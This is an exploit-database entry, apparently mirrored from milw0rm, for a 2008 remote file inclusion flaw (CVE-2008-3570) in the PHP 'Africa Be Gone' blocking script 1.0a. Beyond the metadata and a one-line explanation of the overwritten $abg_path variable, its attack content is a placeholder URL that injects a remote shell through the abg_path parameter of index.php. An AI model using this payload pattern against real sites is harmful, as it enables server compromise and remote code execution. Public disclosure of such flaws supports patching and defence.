ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion

Author: Lo$er
type: webapps
platform: php
port: 
date_added: 2008-07-31 
date_updated: 2016-12-15 
verified: 1 
codes: OSVDB-47381;CVE-2008-3570 
tags: 
aliases:  
screenshot_url:  
application_url: 

=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]